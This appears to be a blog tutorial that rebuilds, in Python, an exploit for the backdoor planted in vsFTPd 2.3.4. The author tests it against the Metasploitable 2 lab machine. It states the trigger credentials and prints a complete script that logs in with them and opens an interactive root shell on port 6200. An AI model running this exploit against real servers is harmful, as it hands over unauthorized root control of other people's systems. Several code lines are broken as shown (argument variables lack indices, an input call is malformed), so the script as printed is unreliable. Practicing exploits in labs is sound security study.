Hello everyone! I've recently discovered my personally favorite way to practice programming languages. Basically, we're going to find an exploit written in a different language, and we're going to rebuild it in the language we want to practice.
In this article, we're going to be rebuilding an exploit that triggers a back door planted in vsFTPd version 2.3.4. Let's quickly run through how this back door is triggered and then we'll move onto the code.
Triggering this back door is actually really simple, we simply need to log in with the username "backdoored:)" and the password "invalid". Once we attempt to log in with these credentials, we should be able to connect to port 6200 to recieve a root shell. Now that we know how this works, let's get into the code!
First, we're going to set our interpreter path and import the modules we need:
#! /usr/bin/python import sys # For arguments import socket # To trigger the back door import threading # Shell handling import time # Delay for shell interaction
Now that we have our modules, let's quickly handle the command line arguments. We're going to take the target IP as the first argument, and the target port number as the second. Let's see the code we'll use to take our arguments:
if len(sys.argv) == 3: pass else: print "usage: ./exploit.py [TARGET IP] [TARGET PORT]" sys.exit(1) target = sys.argv port = sys.argv
Now that we have our arguments handled, we can make the triggering function. We're going to need to make a socket and log in with the aforementioned credentials. We'll name our function "trigger", simple enough, let's take a look at the code:
def trigger(): trigger_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: trigger_socket.connect((target, int(port))) except Exception: print '[!] Failed to Reach Target' sys.exit(1) print '[*] Attempting to Trigger the Back Door... ' banner = trigger_socket.recv(1024) if 'vsFTPd 2.3.4' in banner: trigger_socket.send("USER backdoored:)\n") trigger_socket.recv(1024) trigger_socket.send("PASS invalid\n") trigger_socket.close() print '[*] Trigger Process Complete, Spawning Shell...' return else: print '[!] Invalid Service Detected' sys.exit(1)
Alright, now that might seem a bit complicated, but it's really not. See simply made a socket, grabbed the banner from the server, evaluated the service based on the banner, and logged in with the triggering credentials. Now that we've triggered the back door, we need to connect to it.
First, we're going to make a function that will run as a thread. This means that it will run at the same time as the rest of the script. This function will infinitely print information that it receives from a socket that we're going to connect to the newly spawned shell. Let's look at this function now:
def recv_from_shell(sock, status): sock.settimeout(3) while status == True: try: print sock.recv(1024).strip() except socket.timeout: pass except Exception: return
Now that we have this function, we can make our final function. This function will call the trigger() function, start the recieving the thread, and send the user's input to the shell. Let's take a look at this final function:
def handle(): trigger() shell_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shell_status = True try: shell_socket.connect((target, 6200)) except Exception: print '[!] Failed Interaction with Shell' sys.exit(1) shell_recv_thread = threading.Thread(target=recv_from_shell, args=(shell_socket, shell_status)) shell_recv_thread.start() print '[*] Root Shell Spawned, Pwnage Complete\n' while 1: command = raw_input.strip() if command == 'exit': shell_status = False shell_socket.close() shell_recv_thread.join() sys.exit(0) shell_socket.send(command + '\n') try: handle() except Exception: sys.exit(1) # Emergency exit
There we go! Now that we have our exploit (available here), let's launch it against our victim. We'll be firing it against Metasploitable 2 , which runs vsFTPd 2.3.4 on port 21. Let's launch our exploit and see what happens:
There we have it! Our exploit woks! I hope that we can re-build more exploits like this in the future, as it's a very good way to practice a language of your choice. If you have a language you need to practice, feel free to follow this with your own spin on things!
Thank you for reading!